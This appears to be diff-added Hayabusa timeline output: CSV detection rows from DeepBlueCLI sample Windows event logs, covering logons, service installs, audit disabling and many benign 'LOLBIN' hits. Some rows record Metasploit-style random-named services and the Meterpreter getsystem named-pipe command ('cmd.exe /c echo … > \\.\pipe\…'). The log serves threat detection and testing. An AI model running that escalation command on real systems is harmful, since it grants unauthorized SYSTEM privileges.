+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:32:23.580 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:32:23.595 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 01:52:36.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:58.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 01:58:34.966 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 01:58:34.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:06:20.341 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:34:07.763 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:35:08.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:37:08.229 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:08.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:09.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 02:44:09.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:07:37.968 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:46:20.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 03:57:20.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:57:21.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:05:34.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:05:34.195 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:29.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:30.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:33.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:49.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 04:55:51.989 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:52.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:52.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:53.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:57.149 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:55:59.915 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:56:34.967 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:56:34.999 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:58:48.497 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:58:48.512 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:00:43.879 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:00:43.910 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
